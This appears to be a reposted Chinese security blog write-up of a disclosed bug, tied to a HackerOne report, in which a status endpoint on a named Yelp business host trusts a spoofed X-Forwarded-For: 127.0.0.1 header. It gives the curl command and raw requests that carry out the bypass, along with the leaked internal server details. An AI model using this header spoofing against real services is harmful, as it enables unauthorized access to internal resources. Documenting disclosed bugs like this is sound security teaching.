正文
正常情况下:
➜ curl -k https://biz-app.yelp.com/status
{
"error"
: {
"id"
:
"PredicateMismatch"
}}%
如果是bp里面的请求的话:
GET /authorization-response HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Referer: https://previous.com/path
Origin: https://www.company.com
注入payload之后:
➜ curl -k https://biz-app.yelp.com/status -H
"X-Forwarded-For: 127.0.0.1"
{
"host"
:
"biz--app-main--useast1-74dd77b89b-fgtdk"
,
"health"
: {},
"mem_vsz"
: 1111.61328125,
"mem_rss"
: 410.0,
"pid"
: 91941,
"uptime"
: 178784.86051034927,
"version"
: null}
如果是bp里面的请求的话:
GET /authorization-response HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
X-Forwarded-For: 127.0.0.1
Referer: https://previous.com/path
Origin: https://www.company.com
漏洞点分析
这个安全漏洞点在于Web应用程序信任了HTTP头部中的 "X-Forwarded-For"
字段,并认为该字段中的IP地址就是实际的客户端IP地址。通过伪造这个字段为127.0.0.1(通常代表本地主机或内部网络),攻击者可以欺骗服务器,让服务器认为请求来自于内部网络,从而绕过访问控制,访问内部专用资源。
参考
https://hackerone.com/reports/1011767
原文始发于微信公众号(迪哥讲事):绕过权限限制另类思路
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论